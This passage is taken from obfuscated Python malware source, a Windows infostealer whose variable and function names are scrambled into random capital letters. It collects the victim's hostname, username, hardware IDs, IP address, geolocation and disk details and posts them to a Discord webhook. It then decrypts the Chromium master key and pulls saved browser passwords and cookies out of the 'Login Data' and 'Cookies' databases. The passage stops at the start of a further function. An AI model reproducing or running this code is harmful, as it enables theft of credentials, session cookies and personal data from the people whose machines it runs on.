    try: BNCSHZEAQUQARDMASSLZUQSJODQXMFQOWABLTFSEUDSIVEUNDDILSJI = GPUtil.getGPUs()[0].name if GPUtil.getGPUs() else "None"
    except: BNCSHZEAQUQARDMASSLZUQSJODQXMFQOWABLTFSEUDSIVEUNDDILSJI = "None"

    try:
        ILGBEWZNZPRIJNCQDNWGVLUAPLGCLEJLYIMOZUZUCEPBWUUQTPUVXRERMERS = []
        UGXIKSEBDQXWBJJNKZNJHHQBUYSNIKUIBBYVIGIUBBHQYOHTGHVEYREZQWNVGBWUVUPCWVSIRKAZGVWLNQKIEVCSJMUDYWKD = ctypes.windll.kernel32.GetLogicalDrives()
        for v4r_letter in string.ascii_uppercase:
            if UGXIKSEBDQXWBJJNKZNJHHQBUYSNIKUIBBYVIGIUBBHQYOHTGHVEYREZQWNVGBWUVUPCWVSIRKAZGVWLNQKIEVCSJMUDYWKD & 1:
                DLDJSGAWSHLXFAYMSOWVSVTDIYASRBAPSOURCAFAEQGMBHLLLCLNKTGCLFYQZNPNACWGWDBHZNHJYGYK = v4r_letter + ":\\"
                try:
                    OWXRHJMJPGXLAXCVHGYWWAOHNYZLWAWEEXRDCQOQVMJPEVFBSNHRUMXKOYFUYHUIKFZPENBRDWHKNOOSTUPLVDTGK = ctypes.c_ulonglong(0)
                    ESDFVFINJJBCBHASALXORWRSMJUEMNWYCUJPFQOTFYGBBJWJXAQEDDOSYHEAMQRSRASNIHVXWNTYO = ctypes.c_ulonglong(0)
                    ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(DLDJSGAWSHLXFAYMSOWVSVTDIYASRBAPSOURCAFAEQGMBHLLLCLNKTGCLFYQZNPNACWGWDBHZNHJYGYK), None, ctypes.pointer(ESDFVFINJJBCBHASALXORWRSMJUEMNWYCUJPFQOTFYGBBJWJXAQEDDOSYHEAMQRSRASNIHVXWNTYO), ctypes.pointer(OWXRHJMJPGXLAXCVHGYWWAOHNYZLWAWEEXRDCQOQVMJPEVFBSNHRUMXKOYFUYHUIKFZPENBRDWHKNOOSTUPLVDTGK))
                    FQWBMRNLUXKBWRSHUEHWHWCRPLTMELKIOKJFNOQDPOKNHLHDOWSOIGVAFNEIVXKGDIZKFNFNFIVLTOQHBDVINCMUM = ESDFVFINJJBCBHASALXORWRSMJUEMNWYCUJPFQOTFYGBBJWJXAQEDDOSYHEAMQRSRASNIHVXWNTYO.value
                    AHMIAUURQOPSHRFZKFRCXKDYRWXONSQFLWBWMVHFWTCRWZQQGSQFAKDEPYKS = OWXRHJMJPGXLAXCVHGYWWAOHNYZLWAWEEXRDCQOQVMJPEVFBSNHRUMXKOYFUYHUIKFZPENBRDWHKNOOSTUPLVDTGK.value
                    DBMMZEGXEDSUKXIWDESBPXFXJXAPYMDNHJRRPRJPMFNODWIPDWBCJOWYLBJYSDZZ = FQWBMRNLUXKBWRSHUEHWHWCRPLTMELKIOKJFNOQDPOKNHLHDOWSOIGVAFNEIVXKGDIZKFNFNFIVLTOQHBDVINCMUM - AHMIAUURQOPSHRFZKFRCXKDYRWXONSQFLWBWMVHFWTCRWZQQGSQFAKDEPYKS
                    WVZZOJSOEFXAZQTCLQHKTSOYHDHTSCVLZVBNXSYZZQPWWGFUDEGQOZUYMDDPLMZHPMPHJSUQZMMQHJSWBUYWFPKJHKPQNDNFYGI = win32api.GetVolumeInformation(DLDJSGAWSHLXFAYMSOWVSVTDIYASRBAPSOURCAFAEQGMBHLLLCLNKTGCLFYQZNPNACWGWDBHZNHJYGYK)[0]
                    drive = {
                        'drive': DLDJSGAWSHLXFAYMSOWVSVTDIYASRBAPSOURCAFAEQGMBHLLLCLNKTGCLFYQZNPNACWGWDBHZNHJYGYK,
                        'total': FQWBMRNLUXKBWRSHUEHWHWCRPLTMELKIOKJFNOQDPOKNHLHDOWSOIGVAFNEIVXKGDIZKFNFNFIVLTOQHBDVINCMUM,
                        'free': AHMIAUURQOPSHRFZKFRCXKDYRWXONSQFLWBWMVHFWTCRWZQQGSQFAKDEPYKS,
                        'used': DBMMZEGXEDSUKXIWDESBPXFXJXAPYMDNHJRRPRJPMFNODWIPDWBCJOWYLBJYSDZZ,
                        'name': WVZZOJSOEFXAZQTCLQHKTSOYHDHTSCVLZVBNXSYZZQPWWGFUDEGQOZUYMDDPLMZHPMPHJSUQZMMQHJSWBUYWFPKJHKPQNDNFYGI,
                    }
                    ILGBEWZNZPRIJNCQDNWGVLUAPLGCLEJLYIMOZUZUCEPBWUUQTPUVXRERMERS.append(drive)
                except:
                    ()
            UGXIKSEBDQXWBJJNKZNJHHQBUYSNIKUIBBYVIGIUBBHQYOHTGHVEYREZQWNVGBWUVUPCWVSIRKAZGVWLNQKIEVCSJMUDYWKD >>= 1

        FOMRZUFAQQSJIMMAIJBWOUOPBBQGAPAEMMQUCVHVAKYRRAXYEVVTA = "{:<7} {:<10} {:<10} {:<10} {:<20}\n".format("Drive:", "Free:", "Total:", "Use:", "Name:")
        for v4r_drive in ILGBEWZNZPRIJNCQDNWGVLUAPLGCLEJLYIMOZUZUCEPBWUUQTPUVXRERMERS:
            HJMNTKIPKJXJQPGPWMOZKHQOTGURBPQZPAXKAVVWJMUXNSDDBZJUZYOHSZIBQJNEEZTVVENNMCFBJR = (v4r_drive['used'] / v4r_drive['total']) * 100
            AHMIAUURQOPSHRFZKFRCXKDYRWXONSQFLWBWMVHFWTCRWZQQGSQFAKDEPYKS_gb = "{:.2f}GO".format(v4r_drive['free'] / (1024 ** 3))
            FQWBMRNLUXKBWRSHUEHWHWCRPLTMELKIOKJFNOQDPOKNHLHDOWSOIGVAFNEIVXKGDIZKFNFNFIVLTOQHBDVINCMUM_gb = "{:.2f}GO".format(v4r_drive['total'] / (1024 ** 3))
            HJMNTKIPKJXJQPGPWMOZKHQOTGURBPQZPAXKAVVWJMUXNSDDBZJUZYOHSZIBQJNEEZTVVENNMCFBJR_str = "{:.2f}%".format(HJMNTKIPKJXJQPGPWMOZKHQOTGURBPQZPAXKAVVWJMUXNSDDBZJUZYOHSZIBQJNEEZTVVENNMCFBJR)
            FOMRZUFAQQSJIMMAIJBWOUOPBBQGAPAEMMQUCVHVAKYRRAXYEVVTA += "{:<7} {:<10} {:<10} {:<10} {:<20}".format(v4r_drive['drive'], 
                                                                   AHMIAUURQOPSHRFZKFRCXKDYRWXONSQFLWBWMVHFWTCRWZQQGSQFAKDEPYKS_gb,
                                                                   FQWBMRNLUXKBWRSHUEHWHWCRPLTMELKIOKJFNOQDPOKNHLHDOWSOIGVAFNEIVXKGDIZKFNFNFIVLTOQHBDVINCMUM_gb,
                                                                   HJMNTKIPKJXJQPGPWMOZKHQOTGURBPQZPAXKAVVWJMUXNSDDBZJUZYOHSZIBQJNEEZTVVENNMCFBJR_str,
                                                                   v4r_drive['name'])
    except:
        FOMRZUFAQQSJIMMAIJBWOUOPBBQGAPAEMMQUCVHVAKYRRAXYEVVTA = """Drive:  Free:      Total:     Use:       Name:       
None    None       None       None       None     
"""

    try:
        def IsPortable():
            try:
                battery = psutil.sensors_battery()
                return battery is not None and battery.power_plugged is not None
            except AttributeError:
                return False

        if IsPortable():
            OCNISFXPQYZTWKZNDXZGASWTPQRABCKOHBDBYWFAIRSWDIQIKYWHKNJWTLKIEULWQUYEGKTSUXTVCHBLLTLWJ = 'Pc Portable'
        else:
            OCNISFXPQYZTWKZNDXZGASWTPQRABCKOHBDBYWFAIRSWDIQIKYWHKNJWTLKIEULWQUYEGKTSUXTVCHBLLTLWJ = 'Pc Fixed'
    except:
        OCNISFXPQYZTWKZNDXZGASWTPQRABCKOHBDBYWFAIRSWDIQIKYWHKNJWTLKIEULWQUYEGKTSUXTVCHBLLTLWJ = "None"

    try: VTZJSFSAJMQRSEZLIIXOBBTFBYWMVOHQFMQRIDKKZJQQRHPNNLQDWCFJLEEUHMAFRBVKPOLCTGMXSMSXMILGFTHGRCRSGPOQIX = len(screeninfo.get_monitors())
    except: VTZJSFSAJMQRSEZLIIXOBBTFBYWMVOHQFMQRIDKKZJQQRHPNNLQDWCFJLEEUHMAFRBVKPOLCTGMXSMSXMILGFTHGRCRSGPOQIX = "None"

    embed = Embed(title=f'System Info {MWJPQONMDCWWSTSYPOTJPVUFMBPBJWRWZTRWUZVVMTUSUGCHZGOUBCBAAMISRONFYIYOLJXRJRQAZIEZLIECVRWOYD}:', color=DTTKKKCYSVPJWFZWSMVDSHBOCYYDWPXYKJLOEMZITPMEDXUIABQDQJAMCAJJTWWYCGOMWNGNAAGKYJJERTCBFJZSEDQUDSNZQH)

    embed.add_field(name=":bust_in_silhouette: User Pc:", value=f"""```Hostname    : {KNQQOFCCRTRXHPJZIGWNQXLUCZLWTQHYNZNLVADCBXHPFBUJLULJNQGA}
Username    : {DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}
DisplayName : {KAFPXUJAHXMKHPGZOZVXPIMFFMQMNGWGJVXRUYPRTQETHTGDZAJYCIFCCKUCLUQSFCYOOUVKPLDDH}```""", inline=False)

    embed.add_field(name=":computer: System:", value=f"""```Plateform     : {OCNISFXPQYZTWKZNDXZGASWTPQRABCKOHBDBYWFAIRSWDIQIKYWHKNJWTLKIEULWQUYEGKTSUXTVCHBLLTLWJ}
Exploitation  : {CXYBZFOQGOWLXHOCZNNATCCVTNIDKZVAVZKQETPRSSSLOGGXOSNG} {MKNHAUYPHDIABYVAIRYPRHNHORNEKPKAZAIVNMINVEYGBNPYDVWEAZYMSQGYGQQKBCKSOD}
Screen Number : {VTZJSFSAJMQRSEZLIIXOBBTFBYWMVOHQFMQRIDKKZJQQRHPNNLQDWCFJLEEUHMAFRBVKPOLCTGMXSMSXMILGFTHGRCRSGPOQIX}

HWID : {GMOQQNYTHTYPAMQKMWZJDDCZDIXBZEGYYNVYMVZACSYFSLNOVBABFVUNLJFSKTDNDLWVLOPNJPVUSNZLHCVMNGOAQPDRKR}
MAC  : {ZLSTFWDZOTJFINITDFMLZXHITQWSEFAWCWJLLNUGGQFTDNFQKTEAOSWEUCLZX}
CPU  : {AVUWKZASBXDNMSCJCKSIQUNZUYYMZRKMQJPFIQFQAAGHXDQFFMTNMO}, {NHLXEOGESYVOYQCDPJIBATCDWRUBSPKOYRSYPVMUJNRMGSPPQVIDDPFXHHDLGSOQOUTYIECKAN} Core
GPU  : {BNCSHZEAQUQARDMASSLZUQSJODQXMFQOWABLTFSEUDSIVEUNDDILSJI}
RAM  : {SNVIJKLPOWZKTZUCJYKTMRAZYVLGYLFIZRWBVKMJGRGNHQXRRIXVOYIQGNQJTTQXKASKAZCCZHOQECYBDAQWFGGRVTSBFZNW}Go```""", inline=False)

    embed.add_field(name=":satellite: Ip:", value=f"""```Public : {OBAHGDBIIZSMTYVVNQSIRZAGLEFNRUEQTPGHWDDVQYYFKORYMJOEGAIFEWTIWFQQVAYWRTGYFCSWRHJWZOMEUWUXXOZWRPWB}
Local  : {VGXFRZKCBLCYJZVCKCDPIEFATQKOGVBWQGJLMATYFZGMNFIMRZLGEMLILFUPMDWLNNIDAEKKOKE}
Isp    : {FOWLIELFAIHPZRQYDFILZNXHDGGAOFSVEKWUMAFALMTMEDEWTSWJFIPMDMB}
Org    : {JSOHTQZEURYWOHQBCLEYZXDDBXWPUFFGDFSXTCGGUUIOINPKUEPIPQJJYRMHRNSTKRKCVAEXLYBDJKOTTOBZJVWJBLS}
As     : {MGLTSCFWDBJOZZMSFGMYGSKGTDCCZOCMDMGVOHFXARCXGNKGKMTAWLKWFSUYJDEKPBAUTEQYOWBMFQGGLZCMAGIAKCCBXAQTUV}```""", inline=False)

    embed.add_field(name=":minidisc: Disk:", value=f"""```{FOMRZUFAQQSJIMMAIJBWOUOPBBQGAPAEMMQUCVHVAKYRRAXYEVVTA}```""", inline=False)

    embed.add_field(name=":map: Location:", value=f"""```Country   : {HVPUWOGVUWYWLQIUNYGWUYQOKCVMANXDFLIBSVOMAVWEBAKBTAHDSDJVQGUSSTGKODFCMOHCCOVHDVNDRVWLL} ({HVPUWOGVUWYWLQIUNYGWUYQOKCVMANXDFLIBSVOMAVWEBAKBTAHDSDJVQGUSSTGKODFCMOHCCOVHDVNDRVWLL_code})
Region    : {XLSSXGRHGWFLIOYUBSFQQFKOQFFGYEVREYNMUVKHPVKTNWMQUGQGOZPYBUZIYMTFNCMDRQNJNNYEKSAG} ({XLSSXGRHGWFLIOYUBSFQQFKOQFFGYEVREYNMUVKHPVKTNWMQUGQGOZPYBUZIYMTFNCMDRQNJNNYEKSAG_code})
Zip       : {RARCOWWBUKBWVJUZBWQBMZKAUWJISJTRLVHEVUCITIGINRNAXRM}
City      : {NYBAVGPWGGGNEVJYZVVOJNFAVBZRTRIYKMMCTKOQQYQKWAQLDXGCMPCLJDEQ}
Timezone  : {KEMPDLISVENLBOYLLVEDXLVCCJHOVDDAORTODGBRNDWPBXPTMOOPHPZPINSANTRRNAGEEHPYXUPVNLGUJGJJNX}
Latitude  : {NEZVEPQLONQXNNQEFLJXXMCCCBERMOWMQMQXXNIBJUURASXCKPUDPJA}
Longitude : {YLRMZGPBCFSGWTUCGJZYDLEKLHEEQKFYIZSCNBIANEKPKEKZCLWEGLVIRIASQMS}```""", inline=False)


    embed.set_footer(text=CTYDDRKFZDARVGPASDBJAPLJRUHHJJLJWOROLAERPRXWPAMLKXMNBHIKYFMREUOPOSIEMV, icon_url=PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR)

    LSDSXBVVQABFIKQQUROBYVROAYRIFOSMEWFSEPVWRCILIPSKYMVYLD = SyncWebhook.from_url(NHSKJFRUVKXRLJYQCBLZETDMSIWVOJNTRKZFTNPGMSBSMYCZZYWUSGLCUWDC)
    LSDSXBVVQABFIKQQUROBYVROAYRIFOSMEWFSEPVWRCILIPSKYMVYLD.send(embed=embed, username=QXYCEYRPXWXWGTCQFAGKQNDQWVQARSQYWBPRBZYQLDVIQEFWIOJLGRBELHZIIKDZQX, avatar_url=PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR)

def IHYFFIHZNDERKVLGMPIKQEMLVPLXJHYADLYEYMPFLYOBEGNUVWXVSEEIDOGSKYFAMEXBWWGXOWIQNTXGVODLJYLOXSRZOWBYUSJ():
    import os
    import io
    import zipfile
    import psutil
    import json
    import base64
    import sqlite3
    import win32crypt
    from discord import SyncWebhook, Embed, File
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    QNZJZLKYPRHABOTORVKSQLPIJQIWWWTTFSULPFCSCPTVITMNYZNOXLNXWZOCFHPXIEQCUHIGOJHHOVNOCWU = []
    KMNKMTMXDIJXDZNNWDNHHYYELHKVBSPAHOVSNKVYPEQZKDSCZKCTOAVNJ = []
    QWZPQRAUHNYURDUVCOYHETJNVGSQWLEBRMDNONJSCISHMEVVHJCTNLONISNPGFS = []
    NBYAPYMWIGBNOPXDVEXHGBZZYZYQSCJTXFINKVHXEYVKAGGJVCNEGZBKDWKAHD = []
    ZSHFZAUIFSZNJZSVDWUGRPXQVXNBZMPOCRKMTGGNZVGAJINOZUOMYCMZLM = []
    EMMKHTOVPYVCXUSXOKKYCOPYJAXVUCVUKAMLIPACPVOKMNMBERHLVCOOHWSYWVJZJKCUNQQDUPQSCEZMRUKS = []

    def YUUYGVFFBXVUIKROSBXVJIEMBKYEGPXJMRBYOVUXUCROMBHSJVCVPETUJISZYALVEXUCABR(EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX):
        if not os.path.exists(EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX):
            return None

        try:
            with open(EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX, 'r', encoding='utf-8') as v4r_f:
                RSPJRAKELATMXZGZNITCFMEEDEVDAWQGPWNABVPDKPQIXFNXXI = json.load(v4r_f)

            SBLOCEPXNVWXELADHZBLBBVGLSXFJRALVGUVDKEAHNFPIRQDPSPRRDPBMQAXNZL_key = base64.b64decode(RSPJRAKELATMXZGZNITCFMEEDEVDAWQGPWNABVPDKPQIXFNXXI["os_crypt"]["encrypted_key"])[5:]
            QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC = win32crypt.CryptUnprotectData(SBLOCEPXNVWXELADHZBLBBVGLSXFJRALVGUVDKEAHNFPIRQDPSPRRDPBMQAXNZL_key, None, None, None, 0)[1]
            return QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC
        except:
            return None

    def GMWXGREKPZWUWWSEBSHCSCYJXDIHXECSIXOPGPAZEABVQIYCMPFPMHGSPRXKEOEQIPHLWOFFMCXQCLJFTDASDFQZCBTTYDK(HLQQVKTVFSQYJXIBLSWOBNCYGXMBDYRUKSQRHWUKZMWGQQRLJXRWBILKSIPZGATRBMMAHSWEIDYKNIKODIMGFNKVZKSADPZRUY, QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC):
        try:
            GOMXUHLXJZXDDVQCMDWMNTWITDUEOSJIVTSSMBZGNMVYNYABQMUY = HLQQVKTVFSQYJXIBLSWOBNCYGXMBDYRUKSQRHWUKZMWGQQRLJXRWBILKSIPZGATRBMMAHSWEIDYKNIKODIMGFNKVZKSADPZRUY[3:15]
            WAJALLKXKDDCMUGSZAMGCWNRCHJMISMJYFHFGPOJBIPZOBJIGBLDBGRWXQQOXBJNERIWGQSLWJL = HLQQVKTVFSQYJXIBLSWOBNCYGXMBDYRUKSQRHWUKZMWGQQRLJXRWBILKSIPZGATRBMMAHSWEIDYKNIKODIMGFNKVZKSADPZRUY[15:-16]
            XBZLYBLLJATHBBVWXCVYUGBHTQANCSMYPTIFZOIGHYOJESQJTNAPADCSLZ = HLQQVKTVFSQYJXIBLSWOBNCYGXMBDYRUKSQRHWUKZMWGQQRLJXRWBILKSIPZGATRBMMAHSWEIDYKNIKODIMGFNKVZKSADPZRUY[-16:]
            QHBWDERJWWMMYGLVGEKLKJIWMBLFNFTTKHIAPDNUAMPTHOXAGUPMQECJRXUBZOJWOBMCECDGJWCCOHXFOWVNI = Cipher(algorithms.AES(QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC), modes.GCM(GOMXUHLXJZXDDVQCMDWMNTWITDUEOSJIVTSSMBZGNMVYNYABQMUY, XBZLYBLLJATHBBVWXCVYUGBHTQANCSMYPTIFZOIGHYOJESQJTNAPADCSLZ))
            GGERYAXCANSBOMOQBTSCAADVEBSPKREACPYOTFKZVUMBHCAFFKFESXAZNJWZOCDRTYRSSSAUYZQQIN = QHBWDERJWWMMYGLVGEKLKJIWMBLFNFTTKHIAPDNUAMPTHOXAGUPMQECJRXUBZOJWOBMCECDGJWCCOHXFOWVNI.decryptor()
            FJZARFOFETYJAEZFNIMWTTXYHLGTXPBKTROMAWLADSPKDEVMBUYRDA = GGERYAXCANSBOMOQBTSCAADVEBSPKREACPYOTFKZVUMBHCAFFKFESXAZNJWZOCDRTYRSSSAUYZQQIN.update(WAJALLKXKDDCMUGSZAMGCWNRCHJMISMJYFHFGPOJBIPZOBJIGBLDBGRWXQQOXBJNERIWGQSLWJL) + GGERYAXCANSBOMOQBTSCAADVEBSPKREACPYOTFKZVUMBHCAFFKFESXAZNJWZOCDRTYRSSSAUYZQQIN.finalize()
            return FJZARFOFETYJAEZFNIMWTTXYHLGTXPBKTROMAWLADSPKDEVMBUYRDA.decode()
        except:
            return None
        
    def UPNEMFWVLRGMMTCUZPNGYEPRIMYPFWCVVSCLDTCNGVMABBVAYEPIKJKZRTRPEM(QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS, JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW, QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC):
        QYDFZMKUAXRLYDRHGMRZCLHHCRMQSOMQOYPDSKRKKEPMHMHDXOMKH_db = os.path.join(JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW, 'Login Data')
        if not os.path.exists(QYDFZMKUAXRLYDRHGMRZCLHHCRMQSOMQOYPDSKRKKEPMHMHDXOMKH_db):
            return

        ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO = sqlite3.connect(":memory:")
        disk_conn = sqlite3.connect(QYDFZMKUAXRLYDRHGMRZCLHHCRMQSOMQOYPDSKRKKEPMHMHDXOMKH_db)
        disk_conn.backup(ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO)
        disk_conn.close()
        SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO = ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO.cursor()
        SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO.execute('SELECT action_url, username_value, password_value FROM logins')

        for v4r_row in SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO.fetchall():
            if not v4r_row[0] or not v4r_row[1] or not v4r_row[2]:
                continue
            UFEDUUBTJTRIIQMMSGUKKFYRAEYNQEBQLURZPJDLLISWONESLVRXWWOLUYGWQYASGFJISHLTMDFLYGDONZCBWTVBWFCYX =          f"- Url      : {v4r_row[0]}"
            YVOOFPOPVYADHQAYNISZERVADDUQEVJMNDTOPNMWUVPZITEVBEKPGXLEQNHNKCDSGHRGXTXVRY =     f"  Username : {v4r_row[1]}"
            QYDFZMKUAXRLYDRHGMRZCLHHCRMQSOMQOYPDSKRKKEPMHMHDXOMKH =     f"  Password : {GMWXGREKPZWUWWSEBSHCSCYJXDIHXECSIXOPGPAZEABVQIYCMPFPMHGSPRXKEOEQIPHLWOFFMCXQCLJFTDASDFQZCBTTYDK(v4r_row[2], QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC)}"
            QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS_name = f"  Browser  : {QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS}"
            QNZJZLKYPRHABOTORVKSQLPIJQIWWWTTFSULPFCSCPTVITMNYZNOXLNXWZOCFHPXIEQCUHIGOJHHOVNOCWU.append(f"{UFEDUUBTJTRIIQMMSGUKKFYRAEYNQEBQLURZPJDLLISWONESLVRXWWOLUYGWQYASGFJISHLTMDFLYGDONZCBWTVBWFCYX}\n{YVOOFPOPVYADHQAYNISZERVADDUQEVJMNDTOPNMWUVPZITEVBEKPGXLEQNHNKCDSGHRGXTXVRY}\n{QYDFZMKUAXRLYDRHGMRZCLHHCRMQSOMQOYPDSKRKKEPMHMHDXOMKH}\n{QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS_name}\n")

        ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO.close()

    def LPAJTXYGIGROESELFCDHRPGCDAPMTRGOKBKWFQNTQCRBOGEAWURVRKJGGRVTABBHC(QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS, JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW, QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC):
        RGISOMXPHGBUMPHXOYZOQGGHUWNFTHXYYJTRULBKNHANTBOVNYXSZNAEHNSYCTEGRG = os.path.join(JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW, 'Network', 'Cookies')
        if not os.path.exists(RGISOMXPHGBUMPHXOYZOQGGHUWNFTHXYYJTRULBKNHANTBOVNYXSZNAEHNSYCTEGRG):
            return

        ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO = sqlite3.connect(":memory:")
        disk_conn = sqlite3.connect(RGISOMXPHGBUMPHXOYZOQGGHUWNFTHXYYJTRULBKNHANTBOVNYXSZNAEHNSYCTEGRG)
        disk_conn.backup(ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO)
        disk_conn.close()
        SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO = ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO.cursor()
        SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO.execute('SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies')

        for v4r_row in SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO.fetchall():
            if not v4r_row[0] or not v4r_row[1] or not v4r_row[2] or not v4r_row[3]:
                continue
            UFEDUUBTJTRIIQMMSGUKKFYRAEYNQEBQLURZPJDLLISWONESLVRXWWOLUYGWQYASGFJISHLTMDFLYGDONZCBWTVBWFCYX =          f"- Url     : {v4r_row[0]}"
            HLVVZSMONUAXWWDKYDBXZOAZDQZTFAEUWQHAIDCEAVQPWPBIJYEHUX =         f"  Name    : {v4r_row[1]}"
            EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX =         f"  Path    : {v4r_row[2]}"
            JRCOEQHBUNMCOQACXNGXLNIAGYPUVLJKJEGZLXPTADUGLXYPND =       f"  Cookie  : {GMWXGREKPZWUWWSEBSHCSCYJXDIHXECSIXOPGPAZEABVQIYCMPFPMHGSPRXKEOEQIPHLWOFFMCXQCLJFTDASDFQZCBTTYDK(v4r_row[3], QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC)}"
            GMIWNSKRLJZBNIQCXBYWYVSNQOBICXGOLEMAAKVHJKSXGLIVWNWPVIHPBDTMFUMIYKKLHKKHLNKZLOFJ =       f"  Expire  : {v4r_row[4]}"
            QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS_name = f"  Browser : {QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS}"
            KMNKMTMXDIJXDZNNWDNHHYYELHKVBSPAHOVSNKVYPEQZKDSCZKCTOAVNJ.append(f"{UFEDUUBTJTRIIQMMSGUKKFYRAEYNQEBQLURZPJDLLISWONESLVRXWWOLUYGWQYASGFJISHLTMDFLYGDONZCBWTVBWFCYX}\n{HLVVZSMONUAXWWDKYDBXZOAZDQZTFAEUWQHAIDCEAVQPWPBIJYEHUX}\n{EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX}\n{JRCOEQHBUNMCOQACXNGXLNIAGYPUVLJKJEGZLXPTADUGLXYPND}\n{GMIWNSKRLJZBNIQCXBYWYVSNQOBICXGOLEMAAKVHJKSXGLIVWNWPVIHPBDTMFUMIYKKLHKKHLNKZLOFJ}\n{QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS_name}\n")

        ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO.close()

    def WDFJFBTEZADXBTLNUYHRXJTQMJPGQMOOJNXPMHGCMKCPHXPAURVXUSCSFAMUWYWPHSWMWXLZFAEXIQYCCXYN(QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS, JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW):
